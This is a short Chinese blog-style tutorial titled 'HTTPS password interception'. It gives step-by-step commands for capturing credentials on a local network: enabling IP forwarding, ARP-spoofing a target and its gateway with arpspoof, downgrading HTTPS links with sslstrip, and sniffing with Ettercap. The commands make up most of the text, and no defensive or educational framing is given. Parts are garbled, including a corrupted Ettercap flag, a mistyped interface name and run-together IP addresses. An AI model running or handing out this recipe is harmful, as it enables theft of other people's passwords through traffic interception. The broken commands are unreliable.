HTTPS密码截取



使用工具:

sslstrip   ====》把HTTPS的链接还原为HTTP

Ettercap  ==   DNS欺骗  流量嗅探

ettercap

 

目标IP192.168.1.100

网关IP192.168.1.1

攻击者192.168.1.101

 

Vim /etc/ettercap/etter.conf(需要修改此配置文件)(找到这行把后两行#去掉)

 HTTPS密码截取_第1张图片

 

echo 1 >/proc/sys/net/ipv4/ip_forward   

arpspoof -i etho  -t 192.168.1.100192.168.1.1

sslstrip -a  -f  -k

ettercap  �Tq  -i eth0 

        

HTTPS容易出现证书错误


你可能感兴趣的:(HTTPS密码截取)